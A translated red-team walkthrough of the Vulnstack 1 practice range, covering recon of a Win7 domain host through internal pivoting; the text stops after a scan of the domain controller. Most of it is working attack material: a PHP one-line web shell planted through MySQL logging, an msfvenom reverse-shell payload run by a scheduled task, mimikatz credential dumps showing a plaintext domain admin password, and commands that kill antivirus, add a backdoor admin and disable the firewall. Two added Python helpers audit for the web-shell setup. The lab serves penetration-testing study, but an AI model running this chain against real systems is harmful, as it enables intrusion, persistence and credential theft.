Vulnstack Red Team (1)
The target range is the one shared by 红日安全 (Hongri Security).
Download: http://vulnstack.qiyuanxuetang/vuln/detail/2/
References used for these notes:
CSDN: 谢公子
FreeBuf: 红日安全团队专栏 (Hongri Security team column)
CSDN: assless
Preface
The lab uses two virtual networks.
192.168.72.0/24 simulates the public network (Vmnet2).
192.168.52.0/24 simulates the internal network (Vmnet1).
The attacker machine and the first NIC of the Win7 host are on Vmnet1 (simulated public network).
The second NIC of the Win7 host, together with Win2k3 and Win2k8, is on Vmnet1 (simulated internal network).
First confirm that each segment, and the hosts within it, can communicate normally.
Note: while the Win7 firewall is still enabled, Win7 can reach the other machines, but the other machines cannot ping Win7.
The planned steps are:
1. Information gathering;
2. Exploitation;
3. Lateral movement in the internal network;
   3.1 Internal network information gathering;
   3.2 Exploitation in the internal network;
4. Report and summary (not included in these notes).
Information gathering
Step one: live-host discovery with Nmap:
nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4
The results:
root@AnranNewKali001:~# nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4
Starting Nmap 7.80 ( https://nmap ) at 2020-05-30 22:58 CST
Nmap scan report for 192.168.72.1
Host is up (0.00023s latency).
PORT STATE SERVICE
137/udp open netbios-ns
MAC Address: 00:50:56:C0:00:0C (VMware)
Host script results:
| nbstat: NetBIOS name: DESKTOP-MMVB7A9, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:c0:00:0c (VMware)
| Names:
| DESKTOP-MMVB7A9<20> Flags: <unique><active>
| DESKTOP-MMVB7A9<00> Flags: <unique><active>
|_ STUDYGROUP<00> Flags: <group><active>
Nmap scan report for 192.168.72.129
Host is up (0.00057s latency).
PORT STATE SERVICE
137/udp open netbios-ns
MAC Address: 00:0C:29:C4:33:DF (VMware)
Host script results:
| nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| Names:
| STU1<20> Flags: <unique><active>
| STU1<00> Flags: <unique><active>
| GOD<00> Flags: <group><active>
| GOD<1e> Flags: <group><active>
| GOD<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
Nmap scan report for 192.168.72.254
Host is up (0.00013s latency).
PORT STATE SERVICE
137/udp open|filtered netbios-ns
MAC Address: 00:50:56:E6:D6:C6 (VMware)
Nmap scan report for 192.168.72.128
Host is up (0.00015s latency).
PORT STATE SERVICE
137/udp closed netbios-ns
Nmap done: 256 IP addresses (4 hosts up) scanned in 32.49 seconds
root@AnranNewKali001:~# nmap -Pn 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:18 CST
Nmap done: 1 IP address (0 hosts up) scanned in 0.50 seconds
The host exposed to the public network is 192.168.72.129.
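Reading nbstat results by hand stops scaling after a handful of hosts. The following Python, added here and not part of the original notes, turns this nmap output into a per-host table of NetBIOS name, MAC, advertised domain or workgroup (the <00> group entry, GOD above) and file-server/browser roles; SAMPLE is the scan above trimmed to its nbstat lines, and the suffix-to-role mapping is the standard NetBIOS one.

```python
"""Parse `nmap -sU --script nbstat.nse -p137` output into per-host NetBIOS facts.

Added example, not part of the original write-up. SAMPLE is the scan above,
trimmed to the nbstat lines of the two hosts that answered on 137/udp.
"""
import re

# NetBIOS name suffixes and the service a host advertises with them.
GROUP_ROLES = {"1c": "domain controller"}
UNIQUE_ROLES = {"20": "file server", "1b": "domain master browser", "1d": "master browser"}

RE_HOST = re.compile(r"^Nmap scan report for (\S+)$")
RE_MAC = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")
RE_NBNAME = re.compile(r"^\|\s*nbstat: NetBIOS name: ([^,]+),")
RE_ENTRY = re.compile(r"^\|_?\s+(\S+)<([0-9a-fA-F]{2})>\s+Flags:\s+<(unique|group)>")


def parse_nbstat(text):
    """Return {ip: {"name", "mac", "groups", "roles"}} from nmap's nbstat script output."""
    hosts, cur = {}, None
    for line in text.splitlines():
        if m := RE_HOST.match(line):
            cur = hosts[m.group(1)] = {"name": None, "mac": None, "groups": set(), "roles": set()}
        elif cur is None:
            continue
        elif m := RE_MAC.match(line):
            cur["mac"] = m.group(1).lower()
        elif m := RE_NBNAME.match(line):
            cur["name"] = m.group(1).strip()
        elif m := RE_ENTRY.match(line):
            name, suffix, kind = m.group(1), m.group(2).lower(), m.group(3)
            if kind == "group" and suffix == "00":      # <00> group = domain/workgroup name
                cur["groups"].add(name)
            elif kind == "group" and suffix in GROUP_ROLES:
                cur["roles"].add(GROUP_ROLES[suffix])
            elif kind == "unique" and suffix in UNIQUE_ROLES:
                cur["roles"].add(UNIQUE_ROLES[suffix])
    return hosts


def hosts_in_group(hosts, group):
    """IPs whose NetBIOS table advertises membership of `group` (domain or workgroup)."""
    return sorted(ip for ip, h in hosts.items() if group.upper() in h["groups"])


# Trimmed from the scan above; raw string so the \x01\x02 of __MSBROWSE__ stay literal text.
SAMPLE = r"""Nmap scan report for 192.168.72.1
MAC Address: 00:50:56:C0:00:0C (VMware)
| nbstat: NetBIOS name: DESKTOP-MMVB7A9, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:c0:00:0c (VMware)
| Names:
|   DESKTOP-MMVB7A9<20>  Flags: <unique><active>
|   DESKTOP-MMVB7A9<00>  Flags: <unique><active>
|_  STUDYGROUP<00>       Flags: <group><active>
Nmap scan report for 192.168.72.129
MAC Address: 00:0C:29:C4:33:DF (VMware)
| nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| Names:
|   STU1<20>  Flags: <unique><active>
|   STU1<00>  Flags: <unique><active>
|   GOD<00>   Flags: <group><active>
|   GOD<1e>   Flags: <group><active>
|   GOD<1d>   Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
"""
```

`hosts_in_group(parse_nbstat(SAMPLE), "GOD")` picks out 192.168.72.129 as the only host in the GOD domain, which is how the scan already singles it out from the VMware host and gateway.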
Scan its open ports with Nmap:
root@AnranNewKali001:~# nmap -sC -sV -Pn -p 1-65535 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:21 CST
Stats: 0:02:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 09:24 (0:00:00 remaining)
Nmap scan report for 192.168.72.129
Host is up (0.00089s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1031/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
48478/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:C4:33:DF (VMware)
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-31T01:23:41
|_ start_date: 2020-05-30T14:30:21
Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.49 seconds
This shows that ports 80, 139 and 445 are the ones to test.
There are two directions: the web service, and exploitation with msf.
Next, directory scanning with a tool such as 御剑 (Yujian).
Exploitation
Writing a web shell backdoor
phpMyAdmin and yxcms were found.
Method 1: write a shell through MySQL
phpMyAdmin can be used to write a shell via the MySQL log.
The database uses weak credentials: root / root.
show variables like '%general%';   # check the general log status
SET GLOBAL general_log='on';       # enable the general log
set global general_log_file='C:/phpstudy/www/yxcms/backdoor.php';   # point the log file into the web root
SELECT "<?PHP @EVAL($_POST['zyx']);?>";   # one-line web shell; the query text is written into the log file
Once done, connect to it with 蚁剑 (AntSword).
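The pattern in method 1 needs exactly two settings: general_log ON and general_log_file pointing into a web root. The Python below, added here and not part of the original notes, audits a `SHOW VARIABLES LIKE '%general%';` result for those preconditions; the SAMPLE_* tables are constructed to mirror the state before and after the statements above.

```python
"""Audit MySQL general_log settings for the log-file web shell pattern of method 1.

Added example, not part of the original write-up. SAMPLE_* values are constructed
to mirror the state before and after the SET GLOBAL statements above.
"""
import posixpath

# Extensions the web server would execute if the log file carried them.
SCRIPT_EXTS = {".php", ".php3", ".php5", ".phtml", ".asp", ".aspx", ".jsp"}


def parse_show_variables(text):
    """Parse the table printed by `SHOW VARIABLES LIKE '%general%';` in the mysql client."""
    variables = {}
    for line in text.splitlines():
        if not line.startswith("|"):          # skip +---+ borders and blank lines
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 2 and cells[0] != "Variable_name":
            variables[cells[0]] = cells[1]
    return variables


def _norm(path):
    """Lower-case, forward-slash form so Windows and POSIX paths compare alike."""
    return posixpath.normpath(path.replace("\\", "/").lower())


def path_under(path, root):
    """True if `path` lies inside directory `root`."""
    return (_norm(path) + "/").startswith(_norm(root).rstrip("/") + "/")


def assess_general_log(variables, webroots):
    """Return findings; empty when none of the attack's preconditions hold."""
    findings = []
    log_file = variables.get("general_log_file", "")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: every statement, attacker text included, is written to disk")
    ext = posixpath.splitext(_norm(log_file))[1]
    if ext in SCRIPT_EXTS:
        findings.append(f"general_log_file has a script extension ({ext})")
    for root in webroots:
        if log_file and path_under(log_file, root):
            findings.append(f"general_log_file is inside web root {root}")
    return findings


# Constructed `SHOW VARIABLES LIKE '%general%';` output after method 1 was carried out.
SAMPLE_AFTER = """
+------------------+------------------------------------+
| Variable_name    | Value                              |
+------------------+------------------------------------+
| general_log      | ON                                 |
| general_log_file | C:/phpstudy/www/yxcms/backdoor.php |
+------------------+------------------------------------+
"""
# Constructed baseline: logging off and the log file kept in the data directory.
SAMPLE_BASELINE = """
| general_log      | OFF                                |
| general_log_file | C:/phpstudy/MySQL/data/STU1.log    |
"""
```

The SET GLOBAL statements in method 1 require the SUPER privilege (SYSTEM_VARIABLES_ADMIN on MySQL 8.0), so a web application account without it cannot relocate the log. secure_file_priv does not help here, since it only restricts LOAD DATA and SELECT ... INTO OUTFILE.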
Method 2: start from yxcms
The site reveals default credentials; log in to the admin backend with them.
The backend allows the default templates to be edited.
Save the modified template and test it with AntSword.
Internal network information gathering
Generating a backdoor with msf
Use msf to generate a backdoor file, upload it with AntSword, and add a scheduled task that runs it.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=10086 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe
Adding a scheduled task on Windows
schtasks /create /tn solrindex /tr C:\backdoor.exe /sc minute /mo 1   (create a task named solrindex that runs C:\backdoor.exe every minute)
schtasks /delete /TN solrindex /F   (delete the task)
Reference: CSDN: assless
After the task is in place, start a listener in msf:
msf5 > use multi/handler
# choose and set the payload to match the one given to msfvenom
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
# when the scheduled task fires, msf receives a session.
Privilege escalation and hardening the backdoor
After saving the session with background, sessions -u 1 upgrades session 1 to meterpreter and stores it as session 2.
In meterpreter, use getsystem to escalate privileges.
Then migrate the session into another process (prefer a 64-bit one):
migrate pid
Dumping credentials
If meterpreter output is garbled, chcp 65001 fixes it.
Then load mimikatz.
meterpreter > load mimikatz
meterpreter > help mimikatz
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds.
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;51993 NTLM
0;2492365 Kerberos GOD Administrator hongrisec@2019
0;996 Negotiate GOD STU1$ df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
0;999 Negotiate GOD STU1$ df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
This yields the Administrator password.
Determining the network
Simulated public network: 192.168.72.0/24
Simulated internal network: 192.168.52.0/24
Determining domain information
net time /domain #time server; the primary domain controller normally acts as time server, so this reveals the primary domain
net user /domain #domain users
net view /domain #how many domains there are
ipconfig /all #local IP segments and the domain this host belongs to
net config Workstation #computer name, full name, user name, OS version, workstation domain, logon domain
net user #local users
net group "domain computers" /domain #all host names in the domain
net group "domain admins" /domain #domain administrators
net group "domain controllers" /domain #domain controllers
net localgroup administrators #local administrators (usually includes domain users); in the run below it failed because it was mistyped as localhroup
net user <username> /domain #account details for one user
net group /domain #groups in the domain
net group <groupname> /domain #members of one domain group
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : stu1
Primary Dns Suffix . . . . . . . : god.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : god.org
localdomain
Ethernet adapter 本地连接 4:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
Physical Address. . . . . . . . . : 00-0C-29-51-92-E5
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::d527:9f93:47b9:c7ae%25(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.72.130(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : 2020年5月31日 20:12:47
Lease Expires . . . . . . . . . . : 2020年5月31日 21:27:48
Default Gateway . . . . . . . . . :
DHCP Server . . . . . . . . . . . : 192.168.72.254
DHCPv6 IAID . . . . . . . . . . . : 721423401
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.72.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Npcap Loopback Adapter:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Npcap Loopback Adapter
Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%24(Preferred)
Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 268566604
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter 本地连接 3:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Windows Adapter V9 #2
Physical Address. . . . . . . . . : 00-FF-56-0B-EA-FC
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter 本地连接 2:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Windows Adapter V9
Physical Address. . . . . . . . . : 00-FF-44-8D-CB-B5
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Bluetooth 网络连接:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Bluetooth 设备(个人区域网)
Physical Address. . . . . . . . . : 90-78-41-5E-DD-FE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-51-92-DB
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::9522:e298:7366:33d9%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.52.143(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.52.2
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.52.138
8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{448DCBB5-7D61-4538-9C03-66B5CDAD1222}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #4
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{560BEAFC-DAC4-4687-A564-57790875DC43}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #5
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{43AF3215-AAB6-4AA1-B776-739F7D787259}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #6
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Command 5 (net config Workstation) fails in meterpreter; it works when run from AntSword.
C:\Windows\system32>net time /domain
net time /domain
Current time at \\owa.god.org is 2020/5/31 21:19:39
The command completed successfully.
C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain god.org.
User accounts for \\owa.god.org
-------------------------------------------------------------------------------
Administrator Guest krbtgt
ligang liukaifeng01
The command completed with one or more errors.
C:\Windows\system32>net view /domain
net view /domain
Domain
-------------------------------------------------------------------------------
GOD
The command completed successfully.
C:\Windows\system32>net config Workstation
net config Workstation
System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated.
C:\> net config Workstation
计算机名 \\STU1
计算机全名 stu1.god.org
用户名 Administrator
工作站正运行于
NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C295192DB)
NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C295192E5)
NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本 Windows 7 Professional
工作站域 GOD
工作站域 DNS 名称 god.org
登录域 GOD
COM 打开超时 (秒) 0
COM 发送计数 (字节) 16
COM 发送超时 (毫秒) 250
命令成功完成。
C:\Windows\system32>net group "domain controllers" /domain
net group "domain controllers" /domain
The request will be processed at a domain controller for domain god.org.
Group name Domain Controllers
Comment 域中所有域控制器
Members
-------------------------------------------------------------------------------
OWA$
The command completed successfully.
C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain god.org.
Group name Domain Admins
Comment 指定的域管理员
Members
-------------------------------------------------------------------------------
Administrator OWA$
The command completed successfully.
C:\Windows\system32>net group "domain computers" /domain
net group "domain computers" /domain
The request will be processed at a domain controller for domain god.org.
Group name Domain Computers
Comment 加入到域中的所有工作站和服务器
Members
-------------------------------------------------------------------------------
DEV1$ ROOT-TVI862UBEH$ STU1$
The command completed successfully.
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest liukaifeng01
The command completed with one or more errors.
C:\Windows\system32>net localhroup administrators
net localhroup administrators
The syntax of this command is:
NET
[ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
STATISTICS | STOP | TIME | USE | USER | VIEW ]
C:\Windows\system32>net view
net view
Server Name Remark
-------------------------------------------------------------------------------
\\OWA
\\ROOT-TVI862UBEH
The command completed successfully.
Consolidated information:
Domain: god
Three domain users: Administrator, ligang, liukaifeng01
Three domain hosts: ROOT-TVI862UBEH (192.168.52.141), STU1 (Win7), OWA
Domain controller: OWA (192.168.52.138)
Win7 internal IP: 192.168.52.143
Adding routes to the internal network
run get_local_subnets #list the local subnets
#add or delete routes for a given session from the msf console
route add 192.168.52.0 255.255.255.0 1 #route to 192.168.52.0/24 through session 1
route add 192.168.72.0 255.255.255.0 1 #route to 192.168.72.0/24 through session 1
route add 0.0.0.0 0.0.0.0 1 #default route (0.0.0.0/0) through session 1
route del 192.168.52.0 255.255.255.0 2 #delete the route to 192.168.52.0/24 through session 2
route print #show the routing table
#routes can also be added from inside the session
run autoroute -s 192.168.52.0/24 #route to 192.168.52.0/24
run autoroute -s 192.168.72.0/24 #route to 192.168.72.0/24
run autoroute -s 0.0.0.0/0 #default route (0.0.0.0/0)
run autoroute -p #show the routing table
Post-exploitation modules
run post/windows/manage/migrate #automatic process migration
run post/windows/gather/checkvm #check whether the target runs in a virtual machine
run post/windows/manage/killav #stop anti-virus software
run post/windows/manage/enable_rdp #enable Remote Desktop
run post/windows/manage/autoroute #show routing information
run post/windows/gather/enum_logged_on_users #list logged-on users
run post/windows/gather/enum_applications #list installed applications
run post/windows/gather/credentials/windows_autologin #grab the auto-logon user name and password
run post/windows/gather/smart_hashdump #dump the hashes of all users
run getgui -u hack -p 123 #add an RDP user
Sometimes the post module cannot add a user;
add one from a shell instead:
net user hack Zyx960706 /add
net localgroup administrators hack /add
netsh advfirewall set allprofiles state off #turn off the firewall
net stop windefend #stop the Windows Defender service
Discovering live hosts in the domain (OS, ports)
auxiliary/scanner/discovery/udp_sweep #discover live internal hosts over UDP
auxiliary/scanner/discovery/udp_probe #discover live internal hosts over UDP
auxiliary/scanner/netbios/nbname #discover live internal hosts via NetBIOS
auxiliary/scanner/portscan/tcp #TCP port scan (1-10000); an open port means the host is alive
Hosts .138, .141 and .143 were found.
Port scanning
auxiliary/scanner/portscan/tcp #TCP port scan (1-10000)
auxiliary/scanner/portscan/ack #port scan based on TCP ACK replies, ports 1-10000 by default
Port scanning sometimes terminates the session, so nmap can be uploaded and run from the shell instead. Remember to clean it up afterwards.
Service scanning
auxiliary/scanner/ftp/ftp_version #find internal FTP services, default port 21
auxiliary/scanner/ssh/ssh_version #find internal SSH services, default port 22
auxiliary/scanner/telnet/telnet_version #find internal Telnet services, default port 23
auxiliary/scanner/dns/dns_amp #find DNS services, default port 53
auxiliary/scanner/http/http_version #find internal HTTP services, default port 80
auxiliary/scanner/http/title #retrieve the titles of internal HTTP services
auxiliary/scanner/smb/smb_version #find internal SMB services, default port 445
auxiliary/scanner/mssql/mssql_schemadump #find internal SQL Server services, default port 1433
auxiliary/scanner/oracle/oracle_hashdump #find internal Oracle services, default port 1521
auxiliary/scanner/mysql/mysql_version #find internal MySQL services, default port 3306
auxiliary/scanner/rdp/rdp_scanner #find internal RDP services, default port 3389
auxiliary/scanner/redis/redis_server #find internal Redis services, default port 6379
auxiliary/scanner/db2/db2_version #find internal DB2 services, default port 50000
auxiliary/scanner/netbios/nbname #retrieve the NetBIOS names of internal hosts
Scan results:
C:\Nmap>nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138
nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138
Starting Nmap 7.00 ( https://nmap.org ) at 2020-06-02 09:45 中国标准时间
Nmap scan report for 192.168.52.138
Host is up (0.0027s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds (primary domain: GOD)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port445-TCP:V=7.00%I=7%D=6/2%Time=5ED5AFB0%P=i686-pc-windows-windows%r(
SF:SMBProgNeg,61,"\0\0\0\]\xffSMBr\0\0\0\0\x88\x01@\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0@\x06\0\0\x01\0\x11\x07\0\x0f2\0\x01\0\x04A\0\0\0\0\x01\0\0\0\0\0\
SF:xfc\xf3\x01\0J{\xd5\xc2\x7f8\xd6\x01\x20\xfe\x08\x18\0\x88\xed\xe6R\x94
SF:\xff\xdd\xffG\0O\0D\0\0\0O\0W\0A\0\0\0");
MAC Address: 00:0C:29:5C:30:26 (VMware)
